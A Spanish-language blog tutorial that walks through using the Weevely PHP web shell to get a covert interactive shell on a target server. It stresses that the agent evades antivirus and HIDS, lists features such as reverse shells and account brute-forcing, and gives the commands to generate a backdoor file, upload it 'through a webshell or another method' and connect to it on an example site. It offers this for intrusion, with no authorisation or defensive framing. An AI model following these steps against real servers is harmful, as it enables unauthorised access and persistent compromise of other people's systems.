Resolviendo problemas Back-Connect

Cuando se requiere rootear un servidor necesitamos realizar una conexión Back-Connect para obtener una shell interactiva entre cliente-servidor, pero muchas veces no logramos realizarlo con netcat, putty u otra herramienta debido a ciertas circunstancias.

La ventajas de este método a utilizar:

  • No necesitas abrir un puerto en el router módem
    No necesitas una IP estática

La herramienta a utilizar se llama Weevely y proporciona una consola tipo Telnet a través de un script PHP que se ejecuta en el objetivo, incluso en entornos restringidos.
El código del agente es polimórfico y apenas detectable por AV y HIDS. La comunicación está cubierto y ofuscado dentro del protocolo HTTP usando técnicas esteganográficas.

Carácteristicas:
Shell/PHP telnet-like network terminal
Common server misconfigurations auditing
SQL console pivoting on target
HTTP traffic proxying through target
Mount target file system to local mount point
Conduct network scans pivoting on target
File upload and download
Spawn reverse and direct TCP shells
Bruteforce services accounts
Compress and decompress zip, gzip, bzip2 and tar archives

Instalacion en Linux:

$ sudo apt-get install g++ python-pip libyaml-dev python-dev
# Instalar los siguientes requerimientos
$ sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

Instalación en Windows:

# Entrar en la carpeta donde se encuentra "pip.exe" usualmente en C:\Python27\Scripts\.
# Instalar los siguientes requerimientos.
pip install prettytable Mako PyYAML python-dateutil pyreadline PySocks --upgrade

Descargar weevely3

https://github.com/epinna/weevely3

Ejecutamos el agente para obtener información de ayuda.

$ python weevely.py

Para generar un nuevo cliente, utilizar la opción “generate” pasando los argumentos de contraseña y la ruta.

$ python weevely.py generate backbox ha.php

Código fuente del archivo php generado.

Una vez creado el agente “ha.php” subirlo al servidor por medio de una webshell u otro método.

Establecer la conexión con el agente remoto.

$ weevely.py https://www.sitio.com/ha.php backbox


Saludos, zer0max!

Deja un comentario